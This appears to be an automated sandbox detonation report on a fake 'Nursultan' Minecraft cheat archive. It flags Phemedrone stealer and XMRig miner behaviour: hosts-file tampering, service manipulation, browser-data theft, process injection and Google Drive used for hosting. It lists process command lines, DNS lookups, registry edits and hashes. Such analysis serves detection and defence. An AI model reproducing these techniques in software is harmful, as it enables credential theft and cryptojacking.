Analysis Overview
SHA256
bab8b5e74ab7210b030316dd5685f3fdcceac35bd3b3a90e5dd01592f8abb630
Threat Level: Known bad
The file Nursultan_FREE_2024.zip was found to be: Known bad.
Malicious Activity Summary
xmrig
Phemedrone
XMRig Miner payload
Creates new service(s)
Drops file in Drivers directory
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Stops running service(s)
Executes dropped EXE
Reads user/profile data of web browsers
UPX packed file
Modifies file permissions
Power Settings
Legitimate hosting services abused for malware hosting/C2
Drops desktop.ini file(s)
Suspicious use of SetThreadContext
Drops file in System32 directory
Suspicious use of NtSetInformationThreadHideFromDebugger
Launches sc.exe
Hide Artifacts: Ignore Process Interrupts
Enumerates physical storage devices
Unsigned PE
Checks SCSI registry key(s)
Suspicious use of SendNotifyMessage
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Modifies registry class
Suspicious use of SetWindowsHookEx
Delays execution with timeout.exe
Modifies data under HKEY_USERS
Suspicious use of AdjustPrivilegeToken
Enumerates system info in registry
Modifies Internet Explorer settings
Suspicious use of WriteProcessMemory
Suspicious use of FindShellTrayWindow
MITRE ATT&CK Matrix
Analysis: static1
Detonation Overview
Reported
2024-06-23 13:02
Signatures
Unsigned PE
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-23 13:01
Reported
2024-06-23 13:09
Platform
win10-20240404-en
Max time kernel
130s
Max time network
137s
Command Line
Signatures
Processes
C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\Nursultan_FREE_2024.zip
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.65.42.20.in-addr.arpa | udp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-23 13:01
Reported
2024-06-23 13:09
Platform
win10-20240404-en
Max time kernel
126s
Max time network
140s
Command Line
Signatures
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1320 wrote to memory of 3824 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 1320 wrote to memory of 3824 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 1320 wrote to memory of 3824 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\NursultanNextgen2024\OpenAL.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\NursultanNextgen2024\OpenAL.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 168.117.168.52.in-addr.arpa | udp |
Files
Analysis: behavioral14
Detonation Overview
Submitted
2024-06-23 13:01
Reported
2024-06-23 13:08
Platform
win10-20240404-en
Max time kernel
133s
Max time network
135s
Command Line
Signatures
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\04\3d0cb49d33b9bb2462ad183f65e2e11aea3c1eff — копия (4)"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.173.189.20.in-addr.arpa | udp |
Files
Analysis: behavioral23
Detonation Overview
Submitted
2024-06-23 13:01
Reported
2024-06-23 13:09
Platform
win10-20240404-en
Max time kernel
130s
Max time network
140s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\natives\OpenAL.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 20.231.121.79:80 | | tcp |
| US | 8.8.8.8:53 | 253.15.104.51.in-addr.arpa | udp |
Files
Analysis: behavioral7
Detonation Overview
Submitted
2024-06-23 13:01
Reported
2024-06-23 13:08
Platform
win10-20240404-en
Max time kernel
135s
Max time network
138s
Command Line
Signatures
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\04\04c43a7a9b7883538080f84bf5b4bcba0c8b9f8a
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.173.189.20.in-addr.arpa | udp |
Files
Analysis: behavioral8
Detonation Overview
Submitted
2024-06-23 13:01
Reported
2024-06-23 13:08
Platform
win10-20240404-en
Max time kernel
134s
Max time network
138s
Command Line
Signatures
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\04\04d00bc852751498fad759fe473fef917b51c55d
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.24.18.2.in-addr.arpa | udp |
Files
Analysis: behavioral9
Detonation Overview
Submitted
2024-06-23 13:01
Reported
2024-06-23 13:08
Platform
win10-20240404-en
Max time kernel
134s
Max time network
135s
Command Line
Signatures
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\04\04d181f5f4d61d2215175a1e63e7caaf9b624ab2
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 123.10.44.20.in-addr.arpa | udp |
Files
Analysis: behavioral5
Detonation Overview
Submitted
2024-06-23 13:01
Reported
2024-06-23 13:08
Platform
win10-20240404-en
Max time kernel
133s
Max time network
137s
Command Line
Signatures
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\04\04933f2f39e339e7ba0db0c21812cb9ff9bdce8c
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 16.24.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.173.189.20.in-addr.arpa | udp |
Files
Analysis: behavioral11
Detonation Overview
Submitted
2024-06-23 13:01
Reported
2024-06-23 13:08
Platform
win10-20240404-en
Max time kernel
134s
Max time network
138s
Command Line
Signatures
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\04\04f5636909319c54405c20ff932d92397523aa7a
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.65.42.20.in-addr.arpa | udp |
Files
Analysis: behavioral12
Detonation Overview
Submitted
2024-06-23 13:01
Reported
2024-06-23 13:08
Platform
win10-20240404-en
Max time kernel
134s
Max time network
137s
Command Line
Signatures
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\04\3d0cb49d33b9bb2462ad183f65e2e11aea3c1eff — копия (3)"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.179.89.13.in-addr.arpa | udp |
Files
Analysis: behavioral16
Detonation Overview
Submitted
2024-06-23 13:01
Reported
2024-06-23 13:09
Platform
win10-20240404-en
Max time kernel
130s
Max time network
141s
Command Line
Signatures
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3188 wrote to memory of 312 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 3188 wrote to memory of 312 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 3188 wrote to memory of 312 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\NursultanNextgen2024\jemalloc.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\NursultanNextgen2024\jemalloc.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.179.89.13.in-addr.arpa | udp |
Files
Analysis: behavioral30
Detonation Overview
Submitted
2024-06-23 13:01
Reported
2024-06-23 13:09
Platform
win10-20240404-en
Max time kernel
130s
Max time network
138s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\natives\lwjgl_tinyfd.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 7.251.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-06-23 13:01
Reported
2024-06-23 13:09
Platform
win10-20240404-en
Max time kernel
129s
Max time network
141s
Command Line
Signatures
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3224 wrote to memory of 4460 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 3224 wrote to memory of 4460 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 3224 wrote to memory of 4460 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\NursultanNextgen2024\SAPIWrapper_x64.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\NursultanNextgen2024\SAPIWrapper_x64.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 168.117.168.52.in-addr.arpa | udp |
Files
Analysis: behavioral19
Detonation Overview
Submitted
2024-06-23 13:01
Reported
2024-06-23 13:09
Platform
win10-20240404-en
Max time kernel
125s
Max time network
138s
Command Line
Signatures
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 604 wrote to memory of 212 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 604 wrote to memory of 212 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 604 wrote to memory of 212 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\NursultanNextgen2024\lwjgl_stb.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\NursultanNextgen2024\lwjgl_stb.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 168.117.168.52.in-addr.arpa | udp |
Files
Analysis: behavioral22
Detonation Overview
Submitted
2024-06-23 13:01
Reported
2024-06-23 13:09
Platform
win10-20240611-en
Max time kernel
125s
Max time network
145s
Command Line
Signatures
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\system32\rundll32.exe | N/A |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\natives\Nursultan.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 50.251.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.24.18.2.in-addr.arpa | udp |
Files
memory/2680-0-0x00007FFDFC250000-0x00007FFDFC252000-memory.dmp
memory/2680-1-0x00007FFDFC260000-0x00007FFDFC262000-memory.dmp
memory/2680-2-0x00007FFDBF4C0000-0x00007FFDC04C0000-memory.dmp
Analysis: behavioral29
Detonation Overview
Submitted
2024-06-23 13:01
Reported
2024-06-23 13:09
Platform
win10-20240404-en
Max time kernel
127s
Max time network
149s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\natives\lwjgl_stb.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 50.251.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 168.117.168.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.24.18.2.in-addr.arpa | udp |
Files
Analysis: behavioral17
Detonation Overview
Submitted
2024-06-23 13:01
Reported
2024-06-23 13:09
Platform
win10-20240404-en
Max time kernel
128s
Max time network
136s
Command Line
Signatures
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 240 wrote to memory of 2592 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 240 wrote to memory of 2592 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 240 wrote to memory of 2592 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\NursultanNextgen2024\lwjgl.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\NursultanNextgen2024\lwjgl.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 168.117.168.52.in-addr.arpa | udp |
Files
Analysis: behavioral20
Detonation Overview
Submitted
2024-06-23 13:01
Reported
2024-06-23 13:09
Platform
win10-20240404-en
Max time kernel
129s
Max time network
140s
Command Line
Signatures
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Videos\Captures\desktop.ini | C:\Windows\System32\bcastdvr.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | C:\Windows\System32\GamePanel.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags | C:\Windows\System32\GamePanel.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_QEMU&PROD_HARDDISK\4&215468A5&0&000000 | C:\Windows\System32\GamePanel.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags | C:\Windows\System32\GamePanel.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 508 wrote to memory of 788 | N/A | C:\Program Files (x86)\Common Files\Oracle\Java\javapath\java.exe | C:\Windows\system32\icacls.exe |
| PID 508 wrote to memory of 788 | N/A | C:\Program Files (x86)\Common Files\Oracle\Java\javapath\java.exe | C:\Windows\system32\icacls.exe |
Processes
C:\Program Files (x86)\Common Files\Oracle\Java\javapath\java.exe
java -jar C:\Users\Admin\AppData\Local\Temp\NursultanNextgen2024\minecraft.jar
C:\Windows\System32\GameBarPresenceWriter.exe
"C:\Windows\System32\GameBarPresenceWriter.exe" -ServerName:Windows.Gaming.GameBar.Internal.PresenceWriterServer
C:\Windows\System32\GamePanel.exe
"C:\Windows\System32\GamePanel.exe" 0000000000070218 /startuptips
C:\Windows\System32\bcastdvr.exe
"C:\Windows\System32\bcastdvr.exe" -ServerName:Windows.Media.Capture.Internal.BroadcastDVRServer
C:\Windows\system32\icacls.exe
C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | f.f.f.f.d.b.b.8.0.9.8.2.0.9.0.8.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 168.117.168.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.24.18.2.in-addr.arpa | udp |
Files
memory/508-2-0x000002E71B200000-0x000002E71B470000-memory.dmp
C:\Users\Admin\Videos\Captures\desktop.ini
| MD5 | b0d27eaec71f1cd73b015f5ceeb15f9d |
| SHA1 | 62264f8b5c2f5034a1e4143df6e8c787165fbc2f |
| SHA256 | 86d9f822aeb989755fac82929e8db369b3f5f04117ef96fd76e3d5f920a501d2 |
| SHA512 | 7b5c9783a0a14b600b156825639d24cbbc000f5066c48ce9fecc195255603fc55129aaaca336d7ce6ad4e941d5492b756562f2c7a1d151fcfc2dabac76f3946c |
C:\ProgramData\Oracle\Java\.oracle_jre_usage\3903daac9bc4a3b7.timestamp
| MD5 | 55324ec7b6e94a910826bc794b4a8900 |
| SHA1 | 6669ef463409c88ca4f9c4307c9cb38ad982dd1e |
| SHA256 | 32c0dc5b11d19ec461a1dfada26bc54db94e05e759b138dafcec1f8fff6ed5e3 |
| SHA512 | 8232de84138dd668ec05776db5800c2695e614b40471d428f794b7f801e8f2cd208ef0bf739a2ad6e45ab81cbdb57ed40ad311d4baec3d13bac22281c905941f |
memory/508-28-0x000002E7199F0000-0x000002E7199F1000-memory.dmp
memory/508-29-0x000002E71B200000-0x000002E71B470000-memory.dmp
Analysis: behavioral31
Detonation Overview
Submitted
2024-06-23 13:01
Reported
2024-06-23 13:09
Platform
win10-20240404-en
Max time kernel
130s
Max time network
139s
Command Line
Signatures
Enumerates physical storage devices
Processes
C:\Users\Admin\AppData\Local\Temp\NursultanNextgen2024\rar\UnRAR.exe
"C:\Users\Admin\AppData\Local\Temp\NursultanNextgen2024\rar\UnRAR.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 253.15.104.51.in-addr.arpa | udp |
Files
Analysis: behavioral10
Detonation Overview
Submitted
2024-06-23 13:01
Reported
2024-06-23 13:08
Platform
win10-20240404-en
Max time kernel
147s
Max time network
149s
Command Line
Signatures
Phemedrone
xmrig
XMRig Miner payload
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Creates new service(s)
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Run64.exe | N/A |
| File created | C:\Windows\system32\drivers\etc\hosts | C:\ProgramData\windows\powershell.exe | N/A |
Stops running service(s)
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Java20.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Run64.exe | N/A |
| N/A | N/A | C:\ProgramData\windows\powershell.exe | N/A |
Reads user/profile data of web browsers
UPX packed file
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
Power Settings
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Run64.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log | C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\system32\MRT.exe | C:\ProgramData\windows\powershell.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3456 set thread context of 2940 | N/A | C:\Users\Admin\AppData\Local\Temp\RAR57F8IF\Java20.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 4676 set thread context of 4832 | N/A | C:\ProgramData\windows\powershell.exe | C:\Windows\system32\conhost.exe |
| PID 4676 set thread context of 400 | N/A | C:\ProgramData\windows\powershell.exe | C:\Windows\system32\svchost.exe |
Hide Artifacts: Ignore Process Interrupts
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "835524279" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000c517910592b48541be24303fa89e939b00000000020000000000106600000001000020000000293455c186732604eb0abf0d0fb52f332fdefd8c7c21fe965dcad15f42ef9288000000000e80000000020000200000008df9160c1da26a742d84f2a81acf8c28b5e7cf874e249ffe6c5e668e83c2cda020000000f6d309d1057a7ae491957ec1e796ef80af92dafa5b88236cb8954d3b7d4c704d40000000c648aac9f818d6ebb4103e563b4cdd3823792dc2a4afb65eac9f3ba102df933369fff34f136b8e451c84a646fef346722f73199b8158dab28b77179979a941dd | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = e0b9dd316ec5da01 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.15063.0\"hypervisor=\"No Hypervisor (No SLAT)\"" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\MINIE | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\VersionManager | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
